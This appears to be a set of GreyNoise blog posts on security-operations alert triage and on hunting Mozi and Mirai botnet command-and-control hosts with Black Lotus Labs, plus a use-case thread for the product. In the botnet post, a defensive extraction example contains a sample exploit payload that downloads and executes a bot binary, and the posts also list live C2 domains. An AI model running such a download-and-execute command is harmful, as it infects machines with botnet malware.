For Phantom, on the other hand, we use GreyNoise as an enrichment. The way our monitoring service works, we bring all of our customers' alerts into a single Phantom instance, and we have the GreyNoise-Phantom integration installed. For our analysts looking at the alerts, one of the first things they do is look at the GreyNoise data. If the verdict is "noise," then we know we don't need to do a lot more digging beyond that. This ends up saving us a lot of time because rather than investigating whether this is a targeted attack and figuring out whether anything was exploited, we can just short-circuit the process, note it as a scanner, and send it over. Today we're doing this as a manual process, but it's on our list to automate this into our incoming Phantom playbooks.

GN: What kind of impact has GreyNoise had on your business? Can you share any results?

STEVE MCMASTER: When I first told Andrew that we'd be interested in subscribing, I told him I had no concept of how much something like this would be worth. I didn’t know if we were going to turn this on and see matches with 10 alerts per day across our customers or 100. But the impact on alerts is really the only thing I had to help quantify the value of GreyNoise.

So Andrew gave us a two-week trial, and I added it to our triage tool (this was before we stood up Phantom). I just counted up how many alerts over a week we could have totally ignored with GreyNoise versus how many we could not. Based on the alerts we could safely eliminate, we were saving somewhere in the vicinity of one to one and a half analysts' worth of work per day, out of 22 total analysts at the time.

Today, after implementation and with more customers in hand, GreyNoise helps my teams eliminate background noise and focus on the most actionable and relevant alerts for our customers. Rather than presenting our analysts with even more data to investigate, GreyNoise has allowed us to reduce the volume of alerts that are triggered by 25%, which makes for a happier and more effective SOC team.

And for us as an MSSP, this is even more significant than it might be for an enterprise. When you’re in a normal enterprise business, you can make a decision to spend money on a person or spend money on a product that eliminates alerts--you kind of have to pick your poison. But for us, the calculus is a bit different. When we invest in a person, that analyst can do, say, 20 alerts per day. But if we invest in a product, that product can triage a certain number of alerts at every one of our customers. And for every new customer, it can repeat that work. So even if GreyNoise could only eliminate 8 alerts per day across 40 different customers, that’s 320 alerts. As we add more customers, GreyNoise scales in a way a person wouldn’t.


Mozi-ing around C2s with Black Lotus Labs

GreyNoise sees a lot of botnet activity, both benign and malicious, through our fleet of global sensors. We enlisted Black Lotus Labs®, the threat research arm of Lumen, to help us bring you more information about these botnets and their Command and Control (C2) hosts. A botnet’s C2, as the name implies, is a host from which bots receive their commands, download malicious files, and/or simply report back. Effectively, the C2 is the brain of the operation, and without one, a bot may simply sit dormant.

Black Lotus Labs' mission is to find and disrupt C2s to make the internet a cleaner and safer place. The amount of noise generated by these botnets, driven by their C2s, is astounding. For example, check out the traffic for May just for the Mozi botnet:

Figure 1: Volume of netflow records associated with known Mozi botnet IPs observed by Black Lotus Labs for the month of May, 2021.

Some reports estimate that bots generate 25% of all internet traffic. This reflects what we see at GreyNoise - for example, on any given day, we tag around 30k IPs as ‘Mirai’ or ‘Mirai Variant,' one of the most prevalent bots in the wild. We are always looking for ways to identify sources of internet noise, so hunting botnets and their C2s with the Black Lotus Labs team was a natural fit.

Identifying C2s Using Graph Analysis

To kick off our project, Black Lotus Labs enriched their netflow data using IPs tagged as 'Mirai Variant' in GreyNoise and applied some basic graph algorithms to identify a list of potential C2 IPs. These algorithms surfaced 23 suspected C2 IPs in Black Lotus Labs' data that communicated most heavily with several hundred GreyNoise 'Mirai Variant'-tagged IPs. This one-to-many relationship is indicative of a traditional C2. Some of the potential C2 IPs in Black Lotus Labs' data had previously been identified as Mirai C2s, but, interestingly enough, others were identified as belonging to a botnet family known as Mozi, a newer family that eschews the traditional C2 model.
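A minimal sketch of that one-to-many idea (the data, names, and threshold below are hypothetical, not Black Lotus Labs' actual pipeline): count how many distinct tagged bot IPs each candidate host talks to, and flag the high-degree hosts as suspected C2s.

```python
from collections import defaultdict

# Hypothetical inputs: netflow edges as (src, dst) pairs and a set of
# GreyNoise 'Mirai Variant'-tagged bot IPs. Real data would be far larger.
flows = [
    ("203.0.113.10", "198.51.100.1"),
    ("203.0.113.11", "198.51.100.1"),
    ("203.0.113.12", "198.51.100.1"),
    ("203.0.113.10", "198.51.100.2"),
]
tagged_bots = {"203.0.113.10", "203.0.113.11", "203.0.113.12"}

# Count distinct tagged bots communicating with each non-bot host.
peers = defaultdict(set)
for src, dst in flows:
    if src in tagged_bots and dst not in tagged_bots:
        peers[dst].add(src)

# Hosts contacted by many tagged bots are C2 candidates (threshold is illustrative).
suspected_c2s = [ip for ip, bots in peers.items() if len(bots) >= 3]
print(suspected_c2s)  # -> ['198.51.100.1']
```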

Figure 2: Potential C2 determined by a one-to-many relationship to tagged bots.

Mozi exhibits many of the characteristics of Mirai, with one major exception: it has no central C2. Instead, Mozi is a peer-to-peer (P2P) botnet where every infected host is both a bot and a C2. Each peer propagates configurations and hosts payloads while also performing bot duties such as participating in DDoS, scanning the internet, and exploiting hosts to expand the botnet. For more on Mozi and P2P botnet technology, check out Black Lotus Labs’ analysis.

Figure 3: Centralized botnet (left) vs P2P botnet (right)

Identifying C2s Using Request Analysis

From the GreyNoise side of the project, we decided to look at request payloads within scanner traffic to see if we could identify C2s. We observed that, despite their difference in centralization, botnets like Mirai and Mozi are both notorious for inserting C2 addresses (IPs or domains) into their initial exploit attempt. Typically these exploits will execute a script that fetches a malicious payload from the C2 address and initializes the bot.

If you’ve ever looked at traffic hitting your network perimeter, you have probably seen a request like this:

Figure 4: Example request with C2 IP.

If you extract and check the IP, you might discover, unsurprisingly, that the host is a C2. That’s it. No advanced analytics. No machine learning. No blockchain. Just IP and domain extraction.
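As a hedged sketch of that extraction step (the payload and regex patterns below are illustrative, not our production parser):

```python
import re

# Illustrative exploit payload of the kind shown in Figure 4: a command
# injection that pulls a bootstrap script from the C2 address.
payload = "cd /tmp; wget http://198.51.100.23/bins/mozi.m; chmod +x mozi.m; ./mozi.m"

# Simple patterns for IPv4 addresses and bare domains; a production parser
# would also need to handle URLs, ports, obfuscation, and false positives.
ipv4_re = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
domain_re = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.IGNORECASE)

print(ipv4_re.findall(payload))    # -> ['198.51.100.23']
print(domain_re.findall(payload))  # -> [] here; would catch C2 domains if present
```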

We decided to leverage this insight and test if this was an accurate way to identify P2P Mozi family C2s - that is, IPs that scan like a bot AND deliver peer-to-peer C2 addresses. Our approach was to extract a set of IPs matching this request pattern from our data and then compare the results with Black Lotus Labs C2 data.

Using this method, we compiled a list of 3,368 suspected C2 IPs that appeared to be delivering requests with embedded C2 addresses. Our free Analysis tool confirmed that 97% of these IPs scanned the internet within the last 90 days. Our hypothesis was that this combination of bot and C2 behaviors would allow us to accurately identify P2P Mozi family C2s.

Figure 5: Potential C2s observed scanning by the GreyNoise Analyzer.

To test the hypothesis, we asked Black Lotus Labs to analyze the IP list and identify any C2s already known to them. They found that our list contained 962 IPs previously identified as C2s or botnet peers.

Figure 6: Left, percentage of IPs analyzed by Black Lotus Labs. Right, breakdown of C2 families for the analyzed IPs.

In total, 28% of our potential Mozi IPs were identified by Black Lotus Labs as C2s. Of those, 98% were confirmed as Mozi. So while this is a promising start at identifying suspected C2 IPs, it doesn’t provide conclusive evidence that IPs exhibiting this behavior belong to the Mozi family. Further research is required to profile the remaining 71%, which are most likely simple bots.

Identifying Vulnerabilities Using Extracted C2s

Why is it important to identify C2 IPs like Mozi? Using the confirmed C2 data in hand, we found we can now pivot around the addresses (both IPs and domains) to help identify the vulnerabilities being exploited. For example, take the following C2 domain:

bp65pce2vsk7wpvy2fyehel25ovw4v7nve3lknwzta7gtiuy6jm7l4yd[.]onion[.]ws

We found that more than 50% of traffic containing this C2 domain belonged to IPs, probably bots, exploiting the same three vulnerabilities: TerraMaster TOS (CVE-2020-28188), Zend Framework (CVE-2021-3007), and Liferay Portal (CVE-2020-7961).

The FreakOut botnet is known to exploit this unholy trinity. Although we already have tags for all three of these vulnerabilities, this demonstrates how we can use C2 addresses to automate the process of identifying and tagging known unknowns: vulnerabilities used by botnets.
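As a rough illustration of that pivot (the record shape below is hypothetical; the CVEs are the three named above), you can group the traffic containing a given C2 address by the exploit tags observed alongside it:

```python
from collections import Counter

C2_DOMAIN = "bp65pce2vsk7wpvy2fyehel25ovw4v7nve3lknwzta7gtiuy6jm7l4yd.onion.ws"

# Hypothetical records: (source_ip, raw_request, tags). In practice these would
# come from sensor traffic that GreyNoise has already tagged.
records = [
    ("203.0.113.5", f"POST ... {C2_DOMAIN} ...", ["TerraMaster TOS (CVE-2020-28188)"]),
    ("203.0.113.6", f"GET ... {C2_DOMAIN} ...", ["Zend Framework (CVE-2021-3007)"]),
    ("203.0.113.7", f"POST ... {C2_DOMAIN} ...", ["Liferay Portal (CVE-2020-7961)"]),
]

# Count which exploit tags ride alongside this C2 address.
tag_counts = Counter(
    tag
    for _, request, tags in records
    if C2_DOMAIN in request
    for tag in tags
)
print(tag_counts.most_common())
```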

Recall that bot traffic comprises almost a quarter of all internet traffic. Developing and expanding these techniques allows us to closely examine some of the most common noise on the internet. Any vulnerability check or exploit used by a botnet like Mirai or Mozi is bound to be among the most widely used on the internet. By knowing botnets, we know noise.

Additionally, we want to refine and share these fun C2 addresses, like cnc[.]tacobelllover[.]tk, with our customers and community as a data feed for your projects, research, and work. If this interests you, create a GreyNoise account and join our Community Slack to give us feedback.

Some Thoughts On Fixing Alert Fatigue In The SOC

Please check out Andrew Morris' guest blog on IOActive

It turns out that alert fatigue is not unique to cybersecurity - who knew? Given the fact that alert overload is a problem across industries like healthcare, manufacturing, transportation, and utilities, you’d think that we in the cybersecurity industry would have some better tools and insights about how to handle it. Unfortunately, that’s not the case.

This is why Andrew Morris, founder and CEO of GreyNoise, pulled together his thoughts on the topic and shared them in a guest blog for IOActive. The post is titled “Cybersecurity Alert Fatigue: Why It Happens, Why It Sucks, and What We Can Do About It.” In the article, he covers the main contributing factors to alert fatigue for cybersecurity practitioners, the impact it has on analysts and SOC teams, and some thoughts about addressing the problems at multiple levels.

You know you might have an alert fatigue problem if any of these technical causes of alert fatigue sound familiar:

  • Overmatched, misleading, or outdated indicator telemetry
  • Legitimate computer programs doing weird things
  • Poor security product UX
  • Expected network behavior is a moving target
  • Home networks are now corporate networks
  • Cyberattacks are easier to automate
  • Activity formerly considered malicious is being executed at internet-wide scale by security companies
  • The internet is really noisy

And all of these factors are made worse by a SOC ecosystem that’s not set up for success. This includes vendors who sell on fear, build products that don’t play well with others, focus only on the signal (not the noise), and price their products in ways that drive them to raise as many alerts as possible. And SOCs are equally culpable, putting enormous pressure on analysts to catch every single attack in an environment where the alert volumes just keep growing, and half of them are false positives. Is it any wonder that security analysts exhibit serious alert fatigue and burnout, and that SOCs have extremely high turnover rates?

Please check out the blog post here to learn more about the causes of alert fatigue, why it sucks, and what we can do about it.


GreyNoise Use Cases: Twitter Edition

Andrew Morris got on a roll the other day and knocked out this tweetstorm describing the three key use cases for GreyNoise. You can check out the original Twitter thread here. Enjoy!

I'd like to do an overview of the three most common use-cases to use @GreyNoiseIO for:

  1. Ignore/deprioritize pointless telemetry or alerts in the SOC
  2. Identify compromised systems
  3. Track which vulnerabilities are being opportunistically exploited ITW

Thread (1/26)

1. Improve SOC efficiency

Benign IPs

Let's say I get a wacky IDS alert or am seeing something strange in my logs. I'll look up the IP address in GreyNoise (either using our visualizer or our free Community API).

I looked up the IP address and, oh wow! It's just Shodan! GreyNoise already marked it as benign. No big deal. Paste a link in your ticket to the GreyNoise visualizer and move on.

https://viz.greynoise.io/ip/71.6.135.131

Example of GreyNoise Visualizer showing benign IP address detail

Maybe I don't want to use the GreyNoise web interface. Let's say I look up the IP in the free unauthenticated GreyNoise Community API and... cool, reports back that it's Censys. No problemo. Move on.
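If you'd rather script it, a minimal sketch against the Community API looks roughly like this (the endpoint path and response fields are assumptions based on the public GreyNoise docs; confirm them at docs.greynoise.io before relying on this):

```python
import requests

# Free, unauthenticated Community API lookup (rate-limited).
# Endpoint and field names are assumptions based on the public docs;
# confirm against https://docs.greynoise.io before relying on them.
ip = "71.6.135.131"  # the Shodan scanner IP from the example above
resp = requests.get(f"https://api.greynoise.io/v3/community/{ip}", timeout=10)
data = resp.json()

print(data.get("noise"))           # True if GreyNoise has seen it scanning the internet
print(data.get("riot"))            # True if it belongs to a known-benign business service
print(data.get("classification"))  # e.g. "benign", "malicious", or "unknown"
print(data.get("name"))            # e.g. "Shodan.io"
```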

Example of GreyNoise Community API showing benign IP address detail

Malicious IPs

Let's say I look up an IP address, and it comes back with this big scary red IP address that says "malicious." What does this mean?

https://viz.greynoise.io/ip/45.155.205.165

Example of GreyNoise Visualizer showing malicious IP address detail

Well, this means that the IP is probably malicious (or was observed by GreyNoise doing something bad on our sensors), but whatever attack you're seeing is not targeted at *you specifically*. It was an opportunistic attack. Background noise.

Unknown IPs (to GreyNoise)

What if the IP address... doesn't come back at all?

This means that we've never seen that IP scanning/crawling the Internet, and it doesn't belong to any benign business services. It actually *might* be targeting your organization specifically. Investigate.

Example of GreyNoise Visualizer showing "No results found"

GreyNoise APIs

The GreyNoise Community API is rate limited to a few thousand lookups per day, but it's completely free and unauthenticated. As long as we continue to add enterprise customers and can afford to pay our staff and AWS bills, this will continue to be free.

Note that you don't get context, raw data, metadata, or tags using the Community API. Sorry folks, we've gotta make our money somewhere; that data is available in our Enterprise API. If you want it via API, hit up our sales team. But hey, the Community API itself is free.

Fun fact: Just about every customer we have at GreyNoise sees at least a 20% alert contextualization/reduction rate from using GreyNoise. That's a LOT of wasted human hours spent chasing ghosts.

Analyze a List of IPs

Now let's say you've had an incident, and you need to figure out which of the gazillion IP addresses in some log file compromised your device.

No problemo. Just dump the log file (or just the IP addresses) into the GreyNoise analysis page, and now you can do two things:

  1. Quickly filter out known good guys
  2. If the situation warrants it, quickly identify opportunistic bad guys.

Here's an Analysis from an SSH auth.log I grabbed on a live server on the Internet.

~*~97.22% noise~*~

Example of GreyNoise Visualizer showing Analysis results
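If you'd rather paste just the IPs, here's a quick, illustrative way to pull the unique IPv4 addresses out of an auth.log first (the file path and regex are assumptions):

```python
import re

# Pull unique IPv4 addresses out of an auth.log so you can paste just the IPs
# into the GreyNoise Analysis page.
ipv4_re = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

with open("auth.log") as f:
    ips = sorted({match for line in f for match in ipv4_re.findall(line)})

print("\n".join(ips))
```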

Filter Known-Benign Services (RIOT)

Let's say I'm trawling through a ton of netflow logs, and I want to identify any connections OUT of my network that might be going to bad guys.

I can filter out known-benign services (Zoom, GitHub, Office365, Cloudflare, etc.) using GreyNoise RIOT.

Example of netflow log with a large number of IP addresses to triage
After analysis, just a handful of IP addresses are identified as "malicious" or "unknown"
Example of GreyNoise Visualizer showing RIOT IP address detail

*I'd like to note here that the IPs in RIOT *could potentially* be used by a sufficiently advanced adversary to attack you (async C2, etc.), but 99% of bad guys won't be doing this, and it's not like you can just *BLOCK ZOOM* and not expect blowback.

Don't think of RIOT as a NACL or whitelist/allowlist. Think of RIOT as added context and a time-saver. You can either find out from GreyNoise via RIOT, or you can find out from your helpdesk reps when you block an IP and execs suddenly can't send emails anymore ¯\_(ツ)_/¯

2. Identify compromised devices

Let's say I want to find compromised devices that belong to ME, my users, or just some interesting network around the world.

Just punch a GNQL query into the web interface for the IP block I'm interested in, plus the facet "classification:malicious".

Example of GreyNoise Visualizer showing malicious scanning from devices within an IP address range

You can also find compromised devices using other facets. Here are examples of finding compromised devices in a specific country, or using free text search to find compromised devices in hospitals or government facilities (or both):

Example of GreyNoise Visualizer showing malicious IP addresses related to government
Example of GreyNoise Visualizer showing malicious IP addresses related to hospitals
Example of GreyNoise Visualizer showing malicious IP addresses from a country related to hospitals
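For reference, the GNQL queries behind searches like these look roughly as follows; the facet names are taken from the GreyNoise docs, but treat the exact syntax as something to confirm in the visualizer before use:

```python
# Illustrative GNQL query strings for the searches described above.
# Facet names (classification, metadata.country, cve) follow the GreyNoise docs;
# verify exact syntax in the visualizer or documentation before relying on them.
queries = [
    "classification:malicious 198.51.100.0/24",           # compromised devices in a block
    "classification:malicious metadata.country:Germany",  # compromised devices in a country
    "classification:malicious hospital",                   # free-text search, e.g. hospitals
    "cve:CVE-2021-3129",                                    # who is probing/exploiting a CVE
]
for q in queries:
    print(q)
```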

You can use your FREE GreyNoise account to register alerts on any network blocks or IPs. Once you've registered your alerts, we email you if we see any of your IPs get compromised (e.g., unexpectedly start scanning the internet).

https://viz.greynoise.io/account/alerts

Example of GreyNoise Visualizer showing how to set up Alerts

3. Emerging vulnerability exploitation

You can use GreyNoise to find out whether a given vulnerability is being opportunistically exploited or "vuln checked" at scale. Simply craft a GNQL query for the CVE.

https://viz.greynoise.io/query/cve:CVE-2021-3129

Example of GreyNoise Visualizer showing malicious IP addresses related to a CVE

When a big scary vulnerability is announced, basically everyone has the exact same thought:

"How much do I **really** have to care about this? Is this... being exploited in the wild right now?"

GreyNoise is declaring war on this ambiguity.

You can also see *which* CVEs a given IP address is probing the internet for or opportunistically exploiting. This list is not exhaustive - it takes a lot of work to add coverage to these. This is what @ackmage @nathanqthai and @4b4c41 do.

Example of GreyNoise Visualizer for a malicious IP address showing targeted CVEs

Our Business Model

We have a long way to go on properly productizing this offering. It's really hard to do at scale, and not every vulnerability can be exploited in a way that GreyNoise will ever see. That said, we'll be announcing some new offerings focusing on this use case later this year.

Our business model is pretty simple:

  • Most viz stuff == free but rate limited
  • Community API == free but rate limited
  • GreyNoise in your SIEM/TIP/SOAR == paid

Expect a lot of this stuff to shift over the next few months/years as we find better ways to price/package our features.

That pretty much covers it.

Here are my asks to you:

  • If you use GreyNoise's free products, get in touch with @SupriyaMaz and she'll hook you up with free swag
  • If you work in SOC/TI or at an MSSP and want to hear about our commercial offering, ping sales@greynoise.io

And, of course, ping me anytime. I can't promise a snappy response, but I try to clear my inbox at least every few weeks (aspirational). My email is andrew@greynoise.io.

Oh, last thing. We tag like... hundreds of activities and actors and exploits and vuln probes and tools. Check them all out here (it's searchable, but the layout is pretty unwieldy considering how massive our tag library is now).

https://viz.greynoise.io/tags

Some of the activities and actors and exploits and vuln probes GreyNoise has identified

Onward.

--Andrew
